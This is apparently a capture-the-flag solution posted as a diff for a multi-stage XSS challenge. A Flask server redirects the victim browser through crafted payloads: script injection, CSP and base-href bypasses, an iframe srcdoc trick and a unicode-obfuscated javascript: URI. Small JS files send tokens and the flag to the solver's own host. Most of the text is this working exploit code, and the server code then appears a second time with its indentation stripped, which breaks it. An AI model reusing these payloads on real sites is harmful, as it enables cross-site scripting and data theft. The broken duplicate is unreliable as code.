junorouse · October 24, 2019 16:52
diff --git a/resize.js b/resize.js
 location='http://app.imjuno.com:500/stage5/'+token;
diff --git a/server.py b/server.py
 from flask import Flask, redirect
 app = Flask(__name__)

 import time

 @app.route('/stage0/<token>')
 def stage0(token):
    print 'stage0: ', token
    return redirect('''//stage1.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&tooltip=asdf</asdf><div%20data-ot-show-on="creation"%20data-ot="yes"%20id=asdf%20title="<script>window.name=`<img src=1 onerror=%26quot;location=\'http://app.imjuno.com:500/stage2/\'%2btoken%26quot;>`;location='//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token='%2btoken%2b'%26hint=%26quot;><script>$(name)\\x3c/script>'</script>">helloasdfasdfasdf</div>#asdf'''.format(token=token), code=301)

 @app.route('/stage1/<token>')
 def stage1(token):
    print 'stage1: ', token
    out = '''<html><body><script>window.name=`<img src=1 onerror="location=\'http://app.imjuno.com:500/stage2/\'+token">`;
    location=\'/stage1_redirect/{token}\';
    </script></body></html>'''.format(token=token)
    # print out
    return out

 @app.route('/stage1_redirect/<token>')
 def stage1_redirect(token):
    return redirect('''//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&hint="><script>$(name)</script>'''.format(token=token, code=301))

 @app.route('/stage2/<token>')
 def stage2(token):
    print 'stage2: ', token
    return redirect('//stage3.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&cdn=app.imjuno.com;%20script-src-elem%20app.imjuno.com;%20<base%20href="//app.imjuno.com"><script%20src="/hacklu/stage3.js?aaaaaaa=333333333"></script>'.format(token=token), code=301)

 @app.route('/stage3/<token>')
 def stage3(token):
    print 'stage3: ', token
    return redirect('''//stage4.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&md=<img src="asdf%0a[^asdfasf]<iframe srcdoc='<script src=//app.imjuno.com/hacklu/stage4.js></script>asdf'></iframe>d%0a[^asdfasf]: ddd<>%0aasdf">'''.format(token=token), 301)

 @app.route('/stage4/<token>')
 def stage4(token):
    print 'stage4: ', token
    return redirect('''//stage5.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&homepage=%3Cbase%20href=%22//app.imjuno.com/hacklu/%22%3E'''.format(token=token), 301)

 @app.route('/stage5/<token>')
 def stage5(token):
    print 'stage5: ', token
    return redirect('''//stage6.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&radius=42143%27;location=%27\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075\u0074\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0070\u0070\u002e\u0069\u006d\u006a\u0075\u006e\u006f\u002e\u0063\u006f\u006d\u003a\u0035\u0030\u0030\u002f\u0073\u0074\u0061\u0067\u0065\u0036\u002f\u0022\u002b\u0074\u006f\u006b\u0065\u006e\u003b\u007d\u002c\u0020\u0031\u0029\u003b'''.format(token=token), 301)
    return 'nice'

 @app.route('/stage6/<token>')
 def stage6(token):
    print 'stage6: ', token
    return redirect('//flag.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&youDidIt=location=%27http://app.imjuno.com:500/flag/%27%2bwindow.flag;'.format(token=token), 301)

 @app.route('/flag/<flag>')
 def stage_flag(flag):
    print 'flag: ', flag 
    return 'nice'

 if __name__ == '__main__':
    app.run(host='0.0.0.0', port=500)

diff --git a/stage3.js b/stage3.js
 location='http://app.imjuno.com:500/stage3/'+document.head.outerHTML.split('token = \'')[1].split('\'')[0];
diff --git a/stage4.js b/stage4.js
 location='http://app.imjuno.com:500/stage4/'+parent.parent.token;
	from flask import Flask, redirect
	app = Flask(__name__)

	import time

	@app.route('/stage0/<token>')
	def stage0(token):
	print 'stage0: ', token
	return redirect('''//stage1.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&tooltip=asdf</asdf><div%20data-ot-show-on="creation"%20data-ot="yes"%20id=asdf%20title="<script>window.name=`<img src=1 onerror=%26quot;location=\'http://app.imjuno.com:500/stage2/\'%2btoken%26quot;>`;location='//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token='%2btoken%2b'%26hint=%26quot;><script>$(name)\\x3c/script>'</script>">helloasdfasdfasdf</div>#asdf'''.format(token=token), code=301)

	@app.route('/stage1/<token>')
	def stage1(token):
	print 'stage1: ', token
	out = '''<html><body><script>window.name=`<img src=1 onerror="location=\'http://app.imjuno.com:500/stage2/\'+token">`;
	location=\'/stage1_redirect/{token}\';
	</script></body></html>'''.format(token=token)
	# print out
	return out

	@app.route('/stage1_redirect/<token>')
	def stage1_redirect(token):
	return redirect('''//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&hint="><script>$(name)</script>'''.format(token=token, code=301))

	@app.route('/stage2/<token>')
	def stage2(token):
	print 'stage2: ', token
	return redirect('//stage3.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&cdn=app.imjuno.com;%20script-src-elem%20app.imjuno.com;%20<base%20href="//app.imjuno.com"><script%20src="/hacklu/stage3.js?aaaaaaa=333333333"></script>'.format(token=token), code=301)

	@app.route('/stage3/<token>')
	def stage3(token):
	print 'stage3: ', token
	return redirect('''//stage4.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&md=<img src="asdf%0a[^asdfasf]<iframe srcdoc='<script src=//app.imjuno.com/hacklu/stage4.js></script>asdf'></iframe>d%0a[^asdfasf]: ddd<>%0aasdf">'''.format(token=token), 301)

	@app.route('/stage4/<token>')
	def stage4(token):
	print 'stage4: ', token
	return redirect('''//stage5.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&homepage=%3Cbase%20href=%22//app.imjuno.com/hacklu/%22%3E'''.format(token=token), 301)

	@app.route('/stage5/<token>')
	def stage5(token):
	print 'stage5: ', token
	return redirect('''//stage6.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&radius=42143%27;location=%27\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075\u0074\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0070\u0070\u002e\u0069\u006d\u006a\u0075\u006e\u006f\u002e\u0063\u006f\u006d\u003a\u0035\u0030\u0030\u002f\u0073\u0074\u0061\u0067\u0065\u0036\u002f\u0022\u002b\u0074\u006f\u006b\u0065\u006e\u003b\u007d\u002c\u0020\u0031\u0029\u003b'''.format(token=token), 301)
	return 'nice'

	@app.route('/stage6/<token>')
	def stage6(token):
	print 'stage6: ', token
	return redirect('//flag.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&youDidIt=location=%27http://app.imjuno.com:500/flag/%27%2bwindow.flag;'.format(token=token), 301)

	@app.route('/flag/<flag>')
	def stage_flag(flag):
	print 'flag: ', flag
	return 'nice'

	if __name__ == '__main__':
	app.run(host='0.0.0.0', port=500)